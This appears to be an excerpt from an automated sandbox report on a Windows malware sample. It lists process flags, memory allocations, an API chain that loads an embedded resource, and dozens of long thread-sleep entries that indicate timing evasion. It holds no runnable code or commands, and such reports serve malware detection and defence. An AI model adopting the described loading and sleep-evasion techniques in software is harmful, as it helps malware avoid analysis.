                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeMemory allocated: 2160000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeMemory allocated: 2300000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599563Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599438Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599313Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599078Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598947Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598843Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598734Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598625Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598516Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598391Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598266Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598156Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598046Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597938Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597813Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597688Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597469Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597344Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594563Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594381Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594266Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594156Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594047Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 593938Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeWindow / User API: threadDelayed 7763Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeWindow / User API: threadDelayed 2064Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -599891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7400Thread sleep count: 7763 > 30Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7400Thread sleep count: 2064 > 30Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -599781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -599672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -599563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -599438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -599313s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -599188s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -599078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -598947s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -598843s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -598734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -598625s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -598516s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -598391s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -598266s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -598156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -598046s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -597938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -597813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -597688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -597578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -597469s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -597344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -597235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -597110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -596985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -596860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -596735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -596610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -596485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -596360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -596235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -596110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594381s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594266s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -593938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599563Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599438Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599313Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 599078Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598947Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598843Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598734Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598625Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598516Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598391Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598266Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598156Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 598046Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597938Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597813Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597688Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597469Jump to behavior
